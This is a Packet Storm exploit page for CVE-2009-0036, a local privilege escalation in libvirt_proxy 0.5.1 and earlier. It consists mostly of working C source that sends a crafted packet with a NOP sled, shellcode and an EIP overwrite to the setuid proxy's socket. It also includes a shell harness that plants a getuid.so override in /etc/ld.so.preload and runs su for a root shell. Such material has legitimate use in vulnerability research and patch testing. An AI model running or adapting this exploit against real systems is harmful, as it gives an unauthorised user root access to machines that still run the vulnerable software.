libvirt_proxy versions 0.5.1 and below local privilege escalation exploit.
d6a86f33d2c8f6b21caeda9e12fe29f7be896e99bc24a3e50439a596759674f8/*
* cve-2009-0036.c
*
* libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0036
*
* Buffer overflow in the proxyReadClientSocket function in
* proxy/libvirt_proxy.c in libvirt_proxy 0.5.1 might allow local users to
* gain privileges by sending a portion of the header of a virProxyPacket
* packet, and then sending the remainder of the packet with crafted values
* in the header, related to use of uninitialized memory in a validation
* check.
*
* Usage:
*
* We're guessing to hit our NOP sled, so this program should be run in a
* harness. Since the shellcode will execute /tmp/run as root, the following
* harness will insert a malicious getuid.so payload in /etc/ld.so.preload.
*
* #!/bin/sh
*
* echo "[+] compiling the exploit"
* gcc cve-2009-0036.c -o cve-2009-0036
*
* echo "[+] creating /tmp/getuid.so"
* echo "int getuid(){return 0;}" > /tmp/getuid.c
* gcc -shared /tmp/getuid.c -o /tmp/getuid.so
*
* echo "[+] setting up /tmp/run"
* echo -e "#!/bin/sh" > /tmp/run
* echo -e "touch /tmp/success" >> /tmp/run
* echo -e "echo \"/tmp/getuid.so\" > /etc/ld.so.preload" >> /tmp/run
* chmod +x /tmp/run
*
* echo "[+] starting exploit loop"
* i=0
* rm -f /tmp/success
* while [ ! -e "/tmp/success" ]
* do
* i=$(($i+1))
* echo "RUN NUMBER $i"
* ./cve-2009-0036
* done
*
* echo "[+] our getuid.so is now in ld.so.preload"
* echo "[+] running su to obtain root shell"
* su
*
* Notes:
*
* Tested on Gentoo Linux 32-bit with GCC 4.3.3-r2 and randomize_va_space=1.
* We have a 4096 byte NOP sled before shellcode and EIP followed by 1000
* NOP/30 byte shellcode bundles until we cause a EFAULT in libvirt_proxy's
* read(2). Our total sled is usually around 5k-10k NOPs so it'll take
* ~800-1600 tries on average to hit it and execute our shellcode. Each run
* takes ~1 second, so exploitation will probably take 10-20 minutes on
* average.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#define PROXY_PATH "/usr/libexec/libvirt_proxy"
#define PROXY_SOCKET_PATH "/tmp/livirt_proxy_conn"
#define PROXY_PROTO_VERSION 1
#define PROXY_PACKET_LENGTH 0xffff
/* simple shellcode to execute /tmp/run */
const char shellcode[]=
"\x31\xdb"
"\x8d\x43\x17"
"\x99"
"\xcd\x80"
"\x31\xc9"
"\x51"
"\x68\x2f\x72\x75\x6e"
"\x68\x2f\x74\x6d\x70"
"\x8d\x41\x0b"
"\x89\xe3"
"\xcd\x80";
struct proxy_packet {
uint16_t version;
uint16_t command;
uint16_t serial;
uint16_t len;
};
int
main(int argc, char **argv)
{
FILE *fp;
long ptr;
int i, fd, pid, ret;
char *pkt, nop[65536];
struct sockaddr_un addr;
struct proxy_packet req;
struct timeval tv;
signal(SIGPIPE, SIG_IGN);
/* guess a random offset to jmp to */
gettimeofday(&tv, NULL);
srand((tv.tv_sec ^ tv.tv_usec) ^ getpid());
ptr = 0xbf000000 + (rand() & 0x00ffffff);
/* fire up the setuid libvirt_proxy */
pid = fork();
if (pid == 0) {
execl(PROXY_PATH, "libvirt_proxy", NULL);
}
memset(nop, '\x90', sizeof(nop));
/* connect to libvirt_proxy's AF_UNIX socket */
fd = socket(PF_UNIX, SOCK_STREAM, 0);
if (fd < 0) {
printf("[-] failed to create unix socket\n");
return 1;
}
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
addr.sun_path[0] = '\0';
strncpy(&addr.sun_path[1], PROXY_SOCKET_PATH, strlen(PROXY_SOCKET_PATH));
printf("[+] connecting to libvirt_proxy\n");
if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
printf("[-] cant connect to libvirt_proxy socket\n");
return 1;
}
/* transmit malicious payload to libvirt_proxy */
pkt = (char *) &req;
memset(&req, 0, sizeof(req));
req.version = PROXY_PROTO_VERSION;
req.len = PROXY_PACKET_LENGTH;
printf("[+] sending initial packet header\n");
send(fd, pkt, 7, 0);
usleep(100000);
printf("[+] sending corrupted length value\n");
send(fd, pkt + 7, 1, 0);
printf("[+] sending primary NOP sled\n");
send(fd, nop, 4096, 0);
printf("[+] sending primary shellcode\n");
send(fd, shellcode, 28, 0);
printf("[+] sending EIP overwrite (0x%lx)\n", ptr);
send(fd, &ptr, 4, 0);
usleep(100000);
printf("[+] sending secondary NOP/shellcode bundles\n");
for (i = 0; i < 100; ++i) {
send(fd, nop, 1000, 0);
send(fd, shellcode, 28, 0);
}
close(fd);
usleep(800000);
/* clean slate if our guessed addr failed */
kill(pid, SIGKILL);
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed